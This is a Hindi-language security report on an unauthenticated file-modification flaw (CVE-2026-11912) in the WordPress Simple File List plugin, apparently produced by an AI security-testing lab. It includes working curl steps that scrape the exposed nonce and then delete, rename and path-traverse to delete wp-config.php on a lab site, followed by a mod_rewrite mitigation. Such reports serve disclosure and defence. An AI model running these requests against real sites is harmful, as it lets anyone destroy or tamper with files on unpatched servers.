
अनधिकृत पहुँच से प्रमाणीकरण रहित फ़ाइल संशोधन
| क्षेत्र | मान |
|---|---|
| CVE पहचान | CVE-2026-11912 |
| CVSS स्कोर | 7.5 (उच्च) |
| CVSS वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |
| प्रभावित प्लगिन | Simple File List |
| प्रभावित संस्करण | <= 6.3.7 |
| पैच किया गया संस्करण | 6.3.8 |
| प्रकाशित | जून 19, 2026 |
| शोधकर्ता | Chloe Chamberland - Wordfence |
| प्रयोगशाला वातावरण | poloss-lab.ddev.site (DDEV) |
WordPress के लिए Simple File List प्लगिन, संस्करण 6.3.7 तक के सभी संस्करणों में अपर्याप्त प्राधिकरण जाँच के कारण मनमानी फ़ाइल संशोधन की अनुमति देता है। इससे अप्रमाणित हमलावरों के लिए सर्वर पर फ़ाइलों को हटाना और संशोधित करना संभव हो जाता है।
यह कमज़ोरी निम्न कारणों से मौजूद है:
AJAX एंडपॉइंट पंजीकरण: simplefilelist_edit_job AJAX क्रिया wp_ajax_ और wp_ajax_nopriv_ दोनों हुक्स के साथ पंजीकृत है, जो अप्रमाणित पहुँच की अनुमति देता है:
add_action('wp_ajax_simplefilelist_edit_job', 'simplefilelist_edit_job');
add_action('wp_ajax_nopriv_simplefilelist_edit_job', 'simplefilelist_edit_job');
दोषपूर्ण प्राधिकरण जाँच: eeSFL_FileEditor() (पंक्ति 1265) में प्राधिकरण तर्क का उपयोग:
if(!is_admin() AND $eeSFL->eeListSettings['AllowFrontManage'] != 'YES') {
return;
}
is_admin() फ़ंक्शन AJAX अनुरोधों के लिए FALSE लौटाता है, जिस कारण AllowFrontManage सेटिंग का मूल्यांकन होने से पहले ही प्राधिकरण जाँच शॉर्ट-सर्किट हो जाती है।
नॉन्स एक्सपोज़र: सुरक्षा नॉन्स (eeSFL_ActionNonce) wp_create_nonce() का उपयोग करके उत्पन्न होता है और फ्रंटएंड HTML स्रोत कोड में उजागर होता है, जिससे हमलावर इसे प्रमाणीकरण के बिना निकाल सकते हैं।
परीक्षण के दौरान, इस कमज़ोरी का सफलतापूर्वक WordPress कॉन्फ़िगरेशन फ़ाइल (wp-config.php) को हटाने के लिए शोषण किया गया, जिससे साइट पूरी तरह से टूट गई। यह इस कमज़ोरी के पथ ट्रैवर्सल पहलू की गंभीरता को दर्शाता है।
# सुरक्षा नॉन्स को फ़ाइल सूची पृष्ठ से प्राप्त करें
curl -k -sL "https://poloss-lab.ddev.site/file-list/" | grep -o 'eeSFL_ActionNonce">[^<]*'
# आउटपुट: eeSFL_ActionNonce">1c14af78c2
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
-d "action=simplefilelist_edit_job" \
-d "eeSecurity=1c14af78c2" \
-d "eeSFL_ID=1" \
-d "eeFileAction=Delete" \
-d "eeFileName=test.txt"
# प्रतिक्रिया: SUCCESS
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
-d "action=simplefilelist_edit_job" \
-d "eeSecurity=1c14af78c2" \
-d "eeSFL_ID=1" \
-d "eeFileAction=Edit" \
-d "eeFileName=original.pdf" \
-d "eeFileNameNew=malicious.pdf"
# प्रतिक्रिया: SUCCESS
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
-d "action=simplefilelist_edit_job" \
-d "eeSecurity=1c14af78c2" \
-d "eeSFL_ID=1" \
-d "eeFileAction=Delete" \
-d "eeFileName=../../wp-config.php"
# प्रतिक्रिया: SUCCESS (महत्वपूर्ण - यह साइट को तोड़ देता है!)
[eeSFL] शॉर्टकोड वाले किसी भी पृष्ठ को हटाएँ# simplefilelist_edit_job AJAX कॉल को ब्लॉक करें
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{QUERY_STRING} action=simplefilelist_edit_job
RewriteRule ^wp-admin/admin-ajax\.php$ - [F,L]
</IfModule>
रिपोर्ट Claude Code - WordPress Security Testing Lab द्वारा उत्पन्न दिनांक: जून 20, 2026